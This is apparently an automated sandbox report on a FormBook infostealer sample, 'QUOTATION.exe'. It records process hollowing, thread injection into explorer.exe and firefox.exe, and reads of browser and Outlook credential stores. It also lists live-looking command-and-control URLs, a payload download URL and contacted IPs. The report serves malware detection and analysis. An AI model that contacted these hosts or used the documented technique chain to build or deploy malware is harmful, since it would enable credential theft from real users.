          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337206CF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337EA6C0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337C86C2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33728690 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3379D69D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337AC691 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337DF68C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33730680 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33730680 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33730680 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33730680 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33730680 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33730680 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33730680 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33730680 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33730680 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33730680 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33730680 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33730680 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3373C560 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337A9567 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337FB55F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337FB55F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337EA553 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3373E547 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33756540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33758540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3372254C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33723536 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33723536 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3371753F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3371753F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3371753F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33762539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33751527 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3375F523 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3373252B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3373252B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3373252B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3373252B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3373252B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3373252B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3373252B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33741514 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33741514 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33741514 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33741514 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33741514 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33741514 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337AC51D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337CF51B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337CF51B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337CF51B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337CF51B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337CF51B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337CF51B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337CF51B mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337CF51B mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337CF51B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337CF51B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337CF51B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337CF51B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337CF51B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33722500 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3374E507 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3374E507 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3374E507 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3374E507 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3374E507 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeProcess queried: DebugPort
          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 2_2_00402DC4 GetTempPathA,GetTickCount,GetModuleFileNameA,GetFileSize,LdrInitializeThunk,GlobalAlloc,SetFilePointer,

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 91.184.0.24 80
          Source: C:\Windows\explorer.exeNetwork Connect: 45.194.145.38 80
          Source: C:\Windows\explorer.exeNetwork Connect: 199.192.26.35 80
          Source: C:\Windows\explorer.exeNetwork Connect: 217.160.0.217 80
          Source: C:\Windows\explorer.exeNetwork Connect: 45.56.79.23 80
          Source: C:\Windows\explorer.exeNetwork Connect: 154.215.156.6 80
          Source: C:\Windows\explorer.exeNetwork Connect: 34.117.168.233 80
          Source: C:\Windows\explorer.exeNetwork Connect: 104.21.45.96 80
          Source: C:\Windows\explorer.exeNetwork Connect: 81.17.18.196 80
          Source: C:\Windows\explorer.exeNetwork Connect: 23.83.160.9 80
          Source: C:\Windows\explorer.exeNetwork Connect: 208.91.197.91 80
          Source: C:\Windows\explorer.exeNetwork Connect: 81.17.29.148 80
          Source: C:\Windows\explorer.exeNetwork Connect: 88.212.206.251 80
          Source: C:\Windows\explorer.exeNetwork Connect: 2.57.90.16 80
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\QUOTATION.exeSection unmapped: C:\Windows\SysWOW64\help.exe base address: 9B0000
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\QUOTATION.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\QUOTATION.exeSection loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\QUOTATION.exeSection loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\help.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\help.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\help.exeSection loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
          Source: C:\Windows\SysWOW64\help.exeSection loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
          Writes to foreign memory regions
          Source: C:\Windows\SysWOW64\help.exeMemory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF793FC0000
          Injects a PE file into a foreign processes
          Source: C:\Windows\SysWOW64\help.exeMemory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF793FC0000 value starts with: 4D5A
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\QUOTATION.exeThread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\QUOTATION.exeThread register set: target process: 4812
          Source: C:\Windows\SysWOW64\help.exeThread register set: target process: 4812
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess created: C:\Users\user\Desktop\QUOTATION.exe C:\Users\user\Desktop\QUOTATION.exe
          Source: C:\Windows\SysWOW64\help.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
          Source: explorer.exe, 00000009.00000000.4199991532.0000000001530000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000002.7998474885.0000000001530000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000009.00000000.4199991532.0000000001530000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000002.8008145351.0000000004CC0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.7998474885.0000000001530000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000009.00000000.4199991532.0000000001530000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.4198190622.0000000000D30000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.7993734219.0000000000D30000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000009.00000000.4217880966.000000000D0E9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4747873788.000000000D0E9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8021127369.000000000D0A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWndL
          Source: explorer.exe, 00000009.00000000.4199991532.0000000001530000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000002.7998474885.0000000001530000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 2_2_00403235 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 00000008.00000002.4281303153.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.7993766326.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.7999850935.0000000003760000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.7994581430.0000000003380000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.4281579504.0000000000090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Tries to steal Mail credentials (via file / registry access)
          Source: C:\Windows\SysWOW64\help.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Windows\SysWOW64\help.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
          Source: C:\Windows\SysWOW64\help.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
          Source: C:\Windows\SysWOW64\help.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
          Source: C:\Windows\SysWOW64\help.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
          Source: C:\Windows\SysWOW64\help.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 00000008.00000002.4281303153.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.7993766326.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.7999850935.0000000003760000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.7994581430.0000000003380000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.4281579504.0000000000090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1
          Native API          		1
          DLL Side-Loading          		1
          DLL Side-Loading          		1
          Deobfuscate/Decode Files or Information          		1
          OS Credential Dumping          		3
          File and Directory Discovery          		Remote Services1
          Archive Collected Data          		Exfiltration Over Other Network Medium3
          Ingress Tool Transfer          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
          System Shutdown/Reboot
          Default Accounts1
          Shared Modules          		Boot or Logon Initialization Scripts1
          Access Token Manipulation          		2
          Obfuscated Files or Information          		LSASS Memory4
          System Information Discovery          		Remote Desktop Protocol1
          Data from Local System          		Exfiltration Over Bluetooth11
          Encrypted Channel          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)712
          Process Injection          		1
          Software Packing          		Security Account Manager121
          Security Software Discovery          		SMB/Windows Admin Shares1
          Email Collection          		Automated Exfiltration4
          Non-Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
          Timestomp          		NTDS12
          Virtualization/Sandbox Evasion          		Distributed Component Object Model1
          Clipboard Data          		Scheduled Transfer5
          Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
          DLL Side-Loading          		LSA Secrets2
          Process Discovery          		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common1
          Masquerading          		Cached Domain Credentials1
          Application Window Discovery          		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items12
          Virtualization/Sandbox Evasion          		DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
          Access Token Manipulation          		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)712
          Process Injection          		/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 830630 Sample: QUOTATION.exe Startdate: 20/03/2023 Architecture: WINDOWS Score: 100 35 www.texasgent.com 2->35 37 www.solya-shop.com 2->37 39 20 other IPs or domains 2->39 49 Snort IDS alert for network traffic 2->49 51 Malicious sample detected (through community Yara rule) 2->51 53 Multi AV Scanner detection for submitted file 2->53 55 6 other signatures 2->55 10 QUOTATION.exe 1 38 2->10         started        signatures3 process4 file5 27 C:\Users\user\AppData\Local\...\System.dll, PE32 10->27 dropped 29 C:\Users\user\AppData\...\Utaalmodiges.Taa169, data 10->29 dropped 31 C:\Users\user\AppData\Local\...\System.dll, PE32 10->31 dropped 33 6 other files (none is malicious) 10->33 dropped 67 Tries to detect Any.run 10->67 14 QUOTATION.exe 6 10->14         started        signatures6 process7 dnsIp8 47 www.wittofitentertainment.com 162.240.73.101, 443, 49835 UNIFIEDLAYER-AS-1US United States 14->47 69 Modifies the context of a thread in another process (thread injection) 14->69 71 Tries to detect Any.run 14->71 73 Maps a DLL or memory area into another process 14->73 75 2 other signatures 14->75 18 explorer.exe 2 1 14->18 injected signatures9 process10 dnsIp11 41 www.interactive-media.ru 88.212.206.251, 49841, 49915, 80 UNITEDNETRU Russian Federation 18->41 43 www.brightfms.com 81.17.18.196, 49902, 49903, 49904 PLI-ASCH Switzerland 18->43 45 12 other IPs or domains 18->45 57 System process connects to network (likely due to code injection or exploit) 18->57 22 help.exe 13 18->22         started        signatures12 process13 signatures14 59 Tries to steal Mail credentials (via file / registry access) 22->59 61 Tries to harvest and steal browser information (history, passwords, etc) 22->61 63 Writes to foreign memory regions 22->63 65 3 other signatures 22->65 25 firefox.exe 22->25         started        process15

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          QUOTATION.exe28%VirustotalBrowse
          QUOTATION.exe33%ReversingLabsWin32.Trojan.Leonem

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Alswith\Peroxidisement\Foresprges87\SolutionExplorerCLI.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Wept\libpkcs11-helper-1.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Wept\maintenanceservice2.exe0%ReversingLabs
          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Wept\percentile.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\hamotzi\System.Security.Cryptography.X509Certificates.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\hamotzi\System.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\hamotzi\libdatrie-1.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\nsg9F21.tmp\System.dll0%ReversingLabs

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          10.2.help.exe.3d73814.3.unpack100%AviraTR/Patched.Ren.GenDownload File
          9.2.explorer.exe.142b3814.0.unpack100%AviraTR/Patched.Ren.GenDownload File
          2.0.QUOTATION.exe.400000.0.unpack100%AviraHEUR/AGEN.1223491Download File
          8.0.QUOTATION.exe.400000.0.unpack100%AviraHEUR/AGEN.1223491Download File
          11.2.firefox.exe.5ce3814.0.unpack100%AviraTR/Patched.Ren.GenDownload File
          2.2.QUOTATION.exe.400000.0.unpack100%AviraHEUR/AGEN.1223491Download File

          Domains

          SourceDetectionScannerLabelLink
          td-ccm-168-233.wixdns.net0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.0%Avira URL Cloudsafe
          http://www.dexmart.xyz/d91r/0%Avira URL Cloudsafe
          http://schemas.microsoft.c0%Avira URL Cloudsafe
          http://www.184411.com0%Avira URL Cloudsafe
          http://www.popularartprints.orgT0%Avira URL Cloudsafe
          http://www.eta-trader.netwww.funvacayflorida.com0%Avira URL Cloudsafe
          http://www.interactive-media.ru/d91r/0%Avira URL Cloudsafe
          http://www.solya-shop.com/d91r/0%Avira URL Cloudsafe
          http://www.texasgent.comwww.brightfms.com0%Avira URL Cloudsafe
          http://www.184411.com/d91r/8H7gL=Bxcfm_qbbEGm0%Avira URL Cloudsafe
          https://deff.nelreports.net/api/report?cat=msn0%Avira URL Cloudsafe
          http://www.buymyenergy.com/d91r/8H7gL=Bxcfm_qbbEGm0%Avira URL Cloudsafe
          http://www.184411.com/d91r/0%Avira URL Cloudsafe
          http://www.gopher.ftp://ftp.0%Avira URL Cloudsafe
          http://www.fantasticserver.yachts/d91r/0%Avira URL Cloudsafe
          http://www.dexmart.xyz/d91r/?pO=mny6VZKrhd/9NKVuKuT/s/SGWqKgSQU06gLLPmpyieItdUR08ut5ldoEEciwTOIy3aXJmehMaME22hMIN/PsdP4yT3Vly6kaHw==&8H7gL=Bxcfm_qbbEGm0%Avira URL Cloudsafe
          http://www.b-tek.media/d91r/0%Avira URL Cloudsafe
          http://www.finelinetackdirect.com/d91r/8H7gL=Bxcfm_qbbEGm0%Avira URL Cloudsafe
          http://www.maxhaidt.com/d91r/8H7gL=Bxcfm_qbbEGm0%Avira URL Cloudsafe
          http://www.interactive-media.ru/d91r/?pO=iC4EpsnjqAMsGvgWFbn+fContgVXGATBB72AUlNsZB8RnX0iaYC7Rjz9cHXMA4a3u8hdEGRv958fgJWC172SOiEaLo/g5aJ7NA==&8H7gL=Bxcfm_qbbEGm0%Avira URL Cloudsafe
          http://www.funvacayflorida.com/?fp=dj8phrx%2FM7zn2%2BQxIl96VISg%2BlRAUkJF1tnEn7z1%2BPtQiCFpqnDhHGDoC0%Avira URL Cloudsafe
          http://www.eta-trader.net0%Avira URL Cloudsafe
          http://www.popularartprints.org/d91r/ldE8Xu=oYWDxG4UFF10%Avira URL Cloudsafe
          https://www.wittofitentertainment.com/VeHZpcMYNF28.bin(0%Avira URL Cloudsafe
          http://www.dexmart.xyzwww.finelinetackdirect.com0%Avira URL Cloudsafe
          http://www.maxhaidt.comwww.aznqmd.com0%Avira URL Cloudsafe
          http://www.ghostdyes.net/d91r/0%Avira URL Cloudsafe
          http://www.funvacayflorida.com/d91r/0%Avira URL Cloudsafe
          http://www.dhiyasecurities.comwww.popularartprints.org0%Avira URL Cloudsafe
          http://www.solya-shop.com/d91r/?pO=7PV8upFW6FVa3k/MU+30mMAjyxriZ1cDX5oDGeg3AZSuSXraG6qqoVat6TxNWaSRWOEFtjNQc54wQIQLn7Ha+8c9lg+BGW9hdg==&8H7gL=Bxcfm_qbbEGm0%Avira URL Cloudsafe
          http://www.solya-shop.comwww.buymyenergy.com0%Avira URL Cloudsafe
          http://www.solya-shop.com0%Avira URL Cloudsafe
          http://www.finelinetackdirect.comwww.maxhaidt.com0%Avira URL Cloudsafe
          http://www.texasgent.com/d91r/0%Avira URL Cloudsafe
          http://www.www.fantasticserver.yachts0%Avira URL Cloudsafe
          http://www.brightfms.comwww.eta-trader.net0%Avira URL Cloudsafe
          http://www.brightfms.com/d91r/?8H7gL=Bxcfm_qbbEGm&ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhd0%Avira URL Cloudsafe
          http://www.ghostdyes.net0%Avira URL Cloudsafe
          http://www.popularartprints.org/d91r/0%Avira URL Cloudsafe
          http://www.b-tek.mediawww.dexmart.xyz0%Avira URL Cloudsafe
          http://www.flaviosilva.online0%Avira URL Cloudsafe
          http://www.dexmart.xyz/d91r/8H7gL=Bxcfm_qbbEGm0%Avira URL Cloudsafe
          http://www.brightfms.com/d91r/?pO=BFqfPYQ6Rc2mbekoZnhhN28rIM4KcYUdKeGPb5qgdPRiCoEueOOZiURhvdwkEmvoJvWE5RZiBCNwm7zhRu2A+WCDMptVnP5c5Q==&8H7gL=Bxcfm_qbbEGm0%Avira URL Cloudsafe
          http://www.brightfms.com0%Avira URL Cloudsafe
          http://www.cardinialethanol.com/d91r/0%Avira URL Cloudsafe
          http://www.buymyenergy.comwww.184411.com0%Avira URL Cloudsafe
          http://www.flaviosilva.onlinewww.solya-shop.com0%Avira URL Cloudsafe
          http://www.aznqmd.comwww.0%Avira URL Cloudsafe
          http://www.aznqmd.com/d91r/?pO=PMnnsBn+KIOLN/VfOifa/NU1HKCRW97HYgMDorQQf0wo2T3aBqzEKnmyN0lZa7FB9krY/amKEMrac7kP3KvtrQL60DCopbH9IA==&8H7gL=Bxcfm_qbbEGm0%Avira URL Cloudsafe
          http://www.eta-trader.net/d91r/8H7gL=Bxcfm_qbbEGm0%Avira URL Cloudsafe
          https://word.office.com(0%Avira URL Cloudsafe
          http://www.fantasticserver.yachts/d91r/ldE8Xu=oYWDxG4UFF10%Avira URL Cloudsafe
          http://www.fantasticserver.yachtswww.dhiyasecurities.com0%Avira URL Cloudsafe
          http://www.texasgent.com/d91r/?pO=Cz7EdLoZVVVFkl6Al85Fq2yKknQr9MrL8MY+iTrjKvcqeI67VNXHoBdgAYm0xOpsMAVI5pfYswEw4evz8uHbKlZcCugzfDdIKQ==&8H7gL=Bxcfm_qbbEGm0%Avira URL Cloudsafe
          http://www.buymyenergy.com0%Avira URL Cloudsafe
          http://23.83.160.2:88/tz.php?ref=0%Avira URL Cloudsafe
          http://www.funvacayflorida.comT0%Avira URL Cloudsafe
          http://www.aznqmd.com0%Avira URL Cloudsafe
          http://www.dhiyasecurities.com/d91r/ldE8Xu=oYWDxG4UFF10%Avira URL Cloudsafe
          http://www.cardinialethanol.com0%Avira URL Cloudsafe
          http://www.cardinialethanol.com/d91r/?pO=xFjwo0xAzcGZMdvEtWe8dg3SOJilBZCwp4DaoNJ0mT1+16DKJdlGz7oyHXjYsyYKd34SXU2gi60PXCcIQ24pa/hNG6+rBSLNTw==&8H7gL=Bxcfm_qbbEGm0%Avira URL Cloudsafe
          http://www.b-tek.media0%Avira URL Cloudsafe
          http://www.flaviosilva.online/d91r/0%Avira URL Cloudsafe
          http://www.ghostdyes.net/d91r/8H7gL=Bxcfm_qbbEGm0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.buymyenergy.com
          		45.194.145.38
          		truetrue
            		unknown
            www.cardinialethanol.com
            		45.56.79.23
            		truetrue
              		unknown
              td-ccm-168-233.wixdns.net
              		34.117.168.233
              		truetrueunknown
              eta-trader.net
